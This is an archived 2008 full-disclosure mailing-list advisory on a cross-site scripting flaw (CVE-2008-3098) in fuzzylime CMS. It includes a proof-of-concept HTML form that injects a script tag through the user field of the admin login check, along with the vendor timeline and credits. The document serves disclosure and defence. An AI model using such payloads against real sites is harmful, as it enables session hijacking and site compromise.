[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20080922182611.3911e2e7@mobile.fabian.datensalat.eu>
Date: Mon, 22 Sep 2008 18:26:11 +0000
From: Fabian Fingerle <fabian@...ensalat.eu>
To: bugtraq@...urityfocus.com, full-disclosure@...ts.grok.org.uk
Subject: Cross Site Scripting (XSS) Vulnerabilitiy in
fuzzylime (cms) >=3.02, CVE-2008-3098
Cross Site Scripting (XSS) Vulnerabilitiy in fuzzylime (cms) >=3.02,
CVE-2008-3098
References
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3098
http://cms.fuzzylime.co.uk
Description
Fuzzylime (cms) is a way to run websites and keep it up-to-date. Once
installed, you can update from any internet-connected PC in the world -
you don't even need to know HTML! It has tons of features so whatever
you want from your site, chances are this script will be able to do it
for you.
Example
Assuming Fuzzylime is installed on http://localhost/fuzzylime/, anybody
could inject JavaScript:
<form method="post" action="http://localhost/fuzzylime/admin/usercheck.php">
<input type="hidden" name="log" value="in">
<input type="text" name="user"value='"><script>alert(1)</script>'>
<input type=submit></form>
Disclosure Timeline
2008-09-10 Vendor contacted
2008-09-20 Vendor released 3.03
2008-09-22 Advisory published
CVE Information
The Common Vulnerabilities and Exposures (CVE) project has assigned the
name CVE-2008-3098 to this issue. This is a candidate for inclusion in
the CVE list (http://cve.mitre.org/), which standardizes names for
security problems.
Credits and copyright
This vulnerability was discovered by Fabian Fingerle (published with
help from Hanno Boeck). It's licensed under the creative commons
attribution license.
Fabian Fingerle, 2008-09-22, http://www.fabian-fingerle.de
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists